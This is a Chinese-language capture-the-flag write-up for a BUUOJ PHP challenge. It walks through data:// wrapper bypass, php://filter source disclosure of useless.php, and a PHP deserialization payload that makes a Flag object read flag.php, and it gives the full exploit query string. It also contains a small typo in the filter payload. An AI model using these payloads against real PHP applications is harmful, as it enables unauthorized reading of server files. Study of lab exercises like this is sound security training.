题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,展示了php代码
第二步:使用data协议绕过text参数检测
- 经过代码分析,text参数不能为空,且根据text参数所指定的文件名字读取出来与字符串
welcome to the zjctf
进行比较。 - 使用data协议进行绕过文件读取,将welcome to the zjctf进行64编码后得到:d2VsY29tZSB0byB0aGUgempjdGY=,传入参数text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
第三步:使用filter查看useless.php
- 审计代码看出file参数需要传入useless.php,用于加载useless.php之后对password进行反序列化,再打印password
- 使用filter查看useless.php,构造参数file=php://filter:read=convert.base64-encode/resource=useless.php,得到一串base64编码,解码的到
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
第四步:构造password参数获取flag
- 通过审计uselsee.php得知,password需要传入Flag对象,且对象中file的值为flag.php。
- 在第一步中得知password经过了反序列化,所以要传入序列化的Flag对象。
- 构造php文件获取序列化对象,结果为:
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
<?php
class Flag{ //flag.php
public $file='flag.php';
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$a = serialize(new Flag("flag.php"));
echo $a
?>
- 最终参数为:
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}